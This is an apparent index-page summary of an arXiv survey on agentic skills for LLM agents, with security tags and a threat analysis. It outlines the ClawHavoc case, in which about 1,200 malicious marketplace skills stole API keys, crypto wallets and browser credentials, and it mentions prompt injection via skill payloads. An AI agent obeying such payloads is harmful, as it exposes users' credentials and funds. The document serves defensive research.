survey 2026

SoK: Agentic Skills -- Beyond Tool Use in LLM Agents

Yanna Jiang 1, Delong Li 1, Haiyu Deng 1, Baihe Ma 1, Xu Wang 1, Qin Wang 1,2, Guangsheng Yu 1

0 citations · 74 references · arXiv (Cornell University)

α

Published on arXiv

2602.20867

AI Supply Chain Attacks

OWASP ML Top 10 — ML06

Prompt Injection

OWASP LLM Top 10 — LLM01

Insecure Plugin Design

OWASP LLM Top 10 — LLM07

Key Finding

The ClawHavoc campaign infiltrated ~1,200 malicious skills into a major agent marketplace, exfiltrating API keys, cryptocurrency wallets, and browser credentials at scale, illustrating critical supply-chain vulnerabilities in skill-based LLM agents.


Agentic systems increasingly rely on reusable procedural capabilities, \textit{a.k.a., agentic skills}, to execute long-horizon workflows reliably. These capabilities are callable modules that package procedural knowledge with explicit applicability conditions, execution policies, termination criteria, and reusable interfaces. Unlike one-off plans or atomic tool calls, skills operate (and often do well) across tasks. This paper maps the skill layer across the full lifecycle (discovery, practice, distillation, storage, composition, evaluation, and update) and introduces two complementary taxonomies. The first is a system-level set of \textbf{seven design patterns} capturing how skills are packaged and executed in practice, from metadata-driven progressive disclosure and executable code skills to self-evolving libraries and marketplace distribution. The second is an orthogonal \textbf{representation $\times$ scope} taxonomy describing what skills \emph{are} (natural language, code, policy, hybrid) and what environments they operate over (web, OS, software engineering, robotics). We analyze the security and governance implications of skill-based agents, covering supply-chain risks, prompt injection via skill payloads, and trust-tiered execution, grounded by a case study of the ClawHavoc campaign in which nearly 1{,}200 malicious skills infiltrated a major agent marketplace, exfiltrating API keys, cryptocurrency wallets, and browser credentials at scale. We further survey deterministic evaluation approaches, anchored by recent benchmark evidence that curated skills can substantially improve agent success rates while self-generated skills may degrade them. We conclude with open challenges toward robust, verifiable, and certifiable skills for real-world autonomous agents.


Key Contributions

  • Unified formal definition and lifecycle model for agentic skills (discovery, practice, distillation, storage, composition, evaluation, update) with a seven-pattern design taxonomy
  • Security and governance analysis covering supply-chain risks, prompt injection via skill payloads, trust-tiered execution, and a pattern-specific risk matrix grounded by the ClawHavoc case study (~1,200 malicious marketplace skills)
  • Evaluation framework surveying deterministic approaches with benchmark evidence that curated skills improve agent success while self-generated skills may degrade performance

🛡️ Threat Analysis

AI Supply Chain Attacks

The ClawHavoc case study is explicitly a supply-chain attack where ~1,200 malicious skills infiltrated a major agent marketplace, exfiltrating API keys, cryptocurrency wallets, and browser credentials — a canonical ML supply-chain compromise via a skill distribution platform.


Details

Domains
nlpreinforcement-learning
Model Types
llm
Threat Tags
inference_timetraining_time
Applications
llm agentsautonomous agentsagent marketplacesmulti-agent systems